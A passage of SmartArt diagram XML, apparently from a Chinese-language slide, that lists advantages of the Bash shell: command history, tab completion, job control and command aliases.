    <dgm:cxn modelId="{DFBE27E0-22D1-460F-98A4-A7433B2E0500}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{0B7F10BC-A929-414D-AD7A-37C30DA68429}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{25F2FE9C-C6CF-4C02-9206-A8BAC42AE5E9}" type="presParOf" srcId="{0B7F10BC-A929-414D-AD7A-37C30DA68429}" destId="{8EF2199C-AE34-4147-8323-E37812406FCB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{08553A62-D893-4CE6-9F22-8F8DBE6EFAF8}" type="presParOf" srcId="{0B7F10BC-A929-414D-AD7A-37C30DA68429}" destId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{895AF471-29CB-4BF1-8A2A-E7AE1B3FAE77}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{F89A84F1-88CC-4A50-AA6D-ECB9BA2D8270}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E24E63EE-5CA5-4CB3-BA86-E05FFE18BCD7}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{FB9E64C4-4D06-40C0-9471-A2F7E350AC53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7F0BAB74-B175-4D88-9BFD-72F0CB07287D}" type="presParOf" srcId="{FB9E64C4-4D06-40C0-9471-A2F7E350AC53}" destId="{5ADD30AD-F803-4098-A9A1-2959F46E8B15}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{74DE059E-3321-4F3C-9C1E-9401380B4D9F}" type="presParOf" srcId="{FB9E64C4-4D06-40C0-9471-A2F7E350AC53}" destId="{6B8F2557-19AB-41D3-992D-C75539ABF515}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{10046302-96EA-4151-9915-3EEF733EF42F}" type="presParOf" srcId="{FB9E64C4-4D06-40C0-9471-A2F7E350AC53}" destId="{4516DEB8-739A-4CF3-8E8C-83C037F70E14}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{04621241-45B9-4492-A181-AA73029AA625}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{CECA3A8C-D1DA-4FB5-8FD4-24A1A07A3072}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{70903FC6-B822-473F-9761-4E07DD877EBC}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{9BA20596-EAB3-4002-ABA0-0F3B1F2783A5}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{58A64D56-2234-4C06-AD19-D6144C127528}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{DEAE68B3-3C28-42F6-89D9-7CC3686AFBF6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{47274EFC-B774-4EC5-BFB9-E4E0BD4AF74C}" type="presParOf" srcId="{DEAE68B3-3C28-42F6-89D9-7CC3686AFBF6}" destId="{A76E7686-115B-45EC-A256-C6DF81548B6E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{26C72CF0-D461-4104-922E-762129FD2FC4}" type="presParOf" srcId="{DEAE68B3-3C28-42F6-89D9-7CC3686AFBF6}" destId="{31D9D2DD-3724-4DD9-B725-E0622440FAD8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BE3EA681-0AE2-498B-9E14-F37A8139DC58}" type="presParOf" srcId="{DEAE68B3-3C28-42F6-89D9-7CC3686AFBF6}" destId="{4AAD626F-9956-4957-93DC-426758E4B392}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{78500DF7-B8BB-4B99-BFD4-4FEBA1F618FE}" type="presParOf" srcId="{4AAD626F-9956-4957-93DC-426758E4B392}" destId="{BC2CC3B4-B698-4100-8ECE-9C084094D6F8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3C062BDF-8DC8-45AB-A1B8-94121F092647}" type="presParOf" srcId="{BC2CC3B4-B698-4100-8ECE-9C084094D6F8}" destId="{BF7738DA-1BC9-4745-B9FD-7B758BA94BBD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{311B391D-BCD1-4DA0-A667-8A777CA7EB0E}" type="presParOf" srcId="{BC2CC3B4-B698-4100-8ECE-9C084094D6F8}" destId="{90D7060A-F687-4BF7-A16C-32071EE2DD49}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3F4D2E1D-F733-4FD7-BCE9-8058A8A3C590}" type="presParOf" srcId="{BC2CC3B4-B698-4100-8ECE-9C084094D6F8}" destId="{0CFD3E16-193A-4E98-87C3-5EDA197AFA0B}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3144D5A5-3B9E-4070-B067-E0CC34E9A462}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{AEB809B1-F8AB-41BB-9664-0788EA2F1808}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CB811902-BE40-49AF-811C-713571493662}" type="presParOf" srcId="{EB1A2DB0-4481-4E8E-97B5-759CA8AF91BC}" destId="{A8DAFAEE-5E3B-417E-9731-79E662AE8545}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EB52CF21-C06C-46D8-873A-816889A68FFB}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{36B82FD1-89AA-4EF3-B822-AEB1D925C047}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{46E52038-CC86-43DC-9D65-B25C5DB15B20}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{F06860DF-F552-4EE8-8269-0C972ACE1925}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{2A5381B1-3729-420C-8E31-DFA7ED4142C7}" type="presParOf" srcId="{F06860DF-F552-4EE8-8269-0C972ACE1925}" destId="{5A70C28D-9060-4008-A39A-E92124B7B5DE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{38C8CB2E-95B7-4E86-9165-1380938BE73F}" type="presParOf" srcId="{F06860DF-F552-4EE8-8269-0C972ACE1925}" destId="{3C4A7D68-70DE-4810-9816-7DDF5C8EF7DB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A7C3ED74-2776-4B95-BB11-872DF335B0C3}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{28F07FF1-BC0A-4B11-A1C0-AD22F56E6834}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{39DF7120-9AD7-4662-801C-7B5D5DDAE352}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{A86D61D5-DDC8-43F4-9818-6AD2D5FC3827}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4B9FDFA0-33B4-4A2E-8671-47988E309187}" type="presParOf" srcId="{A86D61D5-DDC8-43F4-9818-6AD2D5FC3827}" destId="{7CC35FAB-DD1C-416A-B961-E7A26F98464A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4A7D13EC-7D4B-4262-BE46-F66E56747E4C}" type="presParOf" srcId="{A86D61D5-DDC8-43F4-9818-6AD2D5FC3827}" destId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{31524E17-1865-4847-8651-79D6FB6463B2}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{B04B9F76-DA15-4F08-A7D9-73361218D256}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{129AB113-685F-480B-A42A-A04BEB76F8B3}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{F4F20BDB-0F06-4549-B22A-CB4EEE2AD303}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B775E50E-81EA-47EF-8616-4E0C91EFC41C}" type="presParOf" srcId="{F4F20BDB-0F06-4549-B22A-CB4EEE2AD303}" destId="{767276DD-CFA0-4AF5-8640-A2B7E131AFBE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9577C546-9BCC-46EC-BE91-F00CC6B1502A}" type="presParOf" srcId="{F4F20BDB-0F06-4549-B22A-CB4EEE2AD303}" destId="{E0C26873-E511-49D3-96E0-CFF55CFE152A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8870FDC1-C357-4FB4-B2D4-71D76CC40B6F}" type="presParOf" srcId="{F4F20BDB-0F06-4549-B22A-CB4EEE2AD303}" destId="{1076DD1D-218B-453B-901D-1DBDAC23E77A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BB45AA17-A276-4377-ABE2-D338C052E8FF}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{C8594BF4-B759-43DF-A0FF-AC914ADACDA8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A31B55ED-FF23-4B91-AC1F-92BD1DC3CA77}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{E3E46A98-0468-4A0A-8914-7D30CC161076}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{107F4FC8-A141-4C8D-AADC-0A0CE1E14751}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{62CD4202-78D6-472A-A404-CEECD0CCE14D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{61118ED6-E327-401E-A1CA-E79E945130A8}" type="presParOf" srcId="{62CD4202-78D6-472A-A404-CEECD0CCE14D}" destId="{7AC3945F-946B-43E2-91EB-C177E48BB613}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{85DDDA58-0D74-47C0-A950-7393B1CE4F67}" type="presParOf" srcId="{62CD4202-78D6-472A-A404-CEECD0CCE14D}" destId="{D0199093-DF47-4E75-B3B0-39E4D5EB791C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3C6A1573-13D4-4B59-A6F9-6FF3E6344785}" type="presParOf" srcId="{62CD4202-78D6-472A-A404-CEECD0CCE14D}" destId="{AF127CE3-51BE-40AF-ABCB-C29C20E38D29}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B37F61FE-A175-4BDD-824A-37A12A24BB06}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{1EBFBE3D-4833-4CE4-B5A0-BA5E7F977860}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{803D8AAC-B703-4FF5-84B4-431933280F1A}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{4CB30F76-4046-4783-A0A9-D1F5089426C1}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{34D441EC-61B3-4FF8-9030-BDD09F27CD9A}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{0B997421-BC70-49C1-83DF-AC6E3D4B2E70}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A095D938-0C09-452F-B1BC-3787FC907C39}" type="presParOf" srcId="{0B997421-BC70-49C1-83DF-AC6E3D4B2E70}" destId="{92985BC6-3469-403E-A4BC-307D132C7B02}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7DC0DB45-5C1D-4C82-AA29-3C480F53A866}" type="presParOf" srcId="{0B997421-BC70-49C1-83DF-AC6E3D4B2E70}" destId="{C462E2C5-8471-47D4-8DC8-317AC2C7F649}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E25945BE-6C5C-4E23-80CB-301903861DDF}" type="presParOf" srcId="{0B997421-BC70-49C1-83DF-AC6E3D4B2E70}" destId="{BC349105-F709-42BF-AE85-F13A2886834C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0FEF386C-04BA-402A-AEF9-09590D0A0E41}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{62A1DC37-D779-4E17-AA87-9913F554A654}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E6AB4D27-8D3E-48CF-B6EE-364BBADDEB0B}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{DB0FC1AE-201A-403E-97FD-E2B66A245D36}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BD33F0FF-801A-4426-99B2-F6C570E686B6}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{E41ABA54-5B5F-433F-98DD-49F943BBDD07}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4220C7F2-AD95-411F-B0F4-8F512A369722}" type="presParOf" srcId="{E41ABA54-5B5F-433F-98DD-49F943BBDD07}" destId="{64FB689F-8946-4C83-B9A7-F6898F096071}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{734AC834-0CAE-4B22-9950-EB3F3FBA7669}" type="presParOf" srcId="{E41ABA54-5B5F-433F-98DD-49F943BBDD07}" destId="{281EFDBB-41E9-4F04-9ADE-8419FD0DEF7B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D561C81C-3EA3-4AA8-9633-39AFD9097724}" type="presParOf" srcId="{E41ABA54-5B5F-433F-98DD-49F943BBDD07}" destId="{5A9EB6CA-AECD-4054-A596-6DD8A88D96E7}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E654CBCA-FBC9-4CF7-B9DB-F1CDD9BA4AC2}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{25C26285-D126-43D1-B6A3-F19E9B631DE7}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D9EA56F0-742E-43B3-8671-CBCD6688CF68}" type="presParOf" srcId="{F72FF9CE-9758-4A81-BAC1-BFFE14D14D48}" destId="{8F71E538-6D09-457D-B0A6-0221D074A4E8}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E7CC035C-6C36-455D-A881-4FAB405DD2E7}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{111D0254-F1CD-4F12-BD16-7AEDF646C3A6}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{159CB6CB-A781-4A64-89DB-79A94A0E4F45}" type="presParOf" srcId="{0FDB2CC5-A0DC-4C3E-A0C1-631FEC7CA1B7}" destId="{241DEA6F-1569-4278-863D-6B920413F309}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{FC76153C-DAFD-4103-B4C0-E3F35CE63187}" type="presParOf" srcId="{241DEA6F-1569-4278-863D-6B920413F309}" destId="{C5C019A3-1DA8-4D09-8ED7-92723E8C1B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7398F8EF-C017-48E9-A862-70B1B7812056}" type="presParOf" srcId="{241DEA6F-1569-4278-863D-6B920413F309}" destId="{B59A6289-ED93-43C4-A48A-A1F6883E68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876731-3F55-4C26-9CB2-A8556FB193F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AE2A9B7F-CBE5-40C0-A647-6589AD013AFF}">
      <dgm:prSet phldrT="[文本]" custT="1">
        <dgm:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </dgm:style>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>Bash Shell</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>的优点</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
            <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FDA3FE6-4A89-4FE8-AE56-4D0A519F1DB1}" type="parTrans" cxnId="{3E727940-147D-44B3-AE81-5BB65DEACF5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D744F90-5821-40C4-B6A3-B7B8B771FC6A}" type="sibTrans" cxnId="{3E727940-147D-44B3-AE81-5BB65DEACF5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC768BFB-1B06-4ACA-82EC-0D5017F4E237}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令记录 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(.bash_history)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CB6C615-84E2-4649-A12B-44334139509D}" type="parTrans" cxnId="{799BD689-8BEE-4AA1-A813-7772AF1638C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40793C0F-08C2-44DD-AD33-60811B306629}" type="sibTrans" cxnId="{799BD689-8BEE-4AA1-A813-7772AF1638C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D64DB01-DB6E-4C53-92FD-2D27FACA4C13}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令自动补全 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(&lt;tab&gt;&lt;tab&gt;)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6631582-D859-4E35-B75E-5C163A6E2B2C}" type="parTrans" cxnId="{79EFEBBB-4F80-4AFF-97AC-D324898470B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5BBAD73-09A7-4124-9BE6-D6F8FC2B4C68}" type="sibTrans" cxnId="{79EFEBBB-4F80-4AFF-97AC-D324898470B9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F9971D7-4FF9-4192-9CD5-F6D38C048B6A}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>作业控制</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(bg, fg, coproc, Ctrl+Z(SIGSTOP), Ctrl+C(SIGINT), Ctrl+\(SIGQUIT), kill)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20116F1A-AF6C-4319-92DA-43302A14792A}" type="parTrans" cxnId="{87D0CF88-956B-4064-9976-13C37257E57F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE668C63-C2F5-4906-9447-0C268EA7D0E1}" type="sibTrans" cxnId="{87D0CF88-956B-4064-9976-13C37257E57F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85628946-7BD9-496D-AAE6-E1A67A4E43AB}">
      <dgm:prSet phldrT="[文本]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>命令别名</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:rPr>
            <a:t>(alias ls=‘ls –la’)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
            <a:latin typeface="+mj-ea"/>
            <a:ea typeface="+mj-ea"/>
            <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C14F7AC2-2C30-4292-9D77-0544F2B17F63}" type="parTrans" cxnId="{BFAB49A1-5648-4280-8191-375D1107EC09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5AAEAAB-99E1-4AB3-A5A2-90FFBB54A299}" type="sibTrans" cxnId="{BFAB49A1-5648-4280-8191-375D1107EC09}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{98537314-D225-4A7F-95F5-263A5E07C2F0}" type="pres">
      <dgm:prSet presAssocID="{A1876731-3F55-4C26-9CB2-A8556FB193FD}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
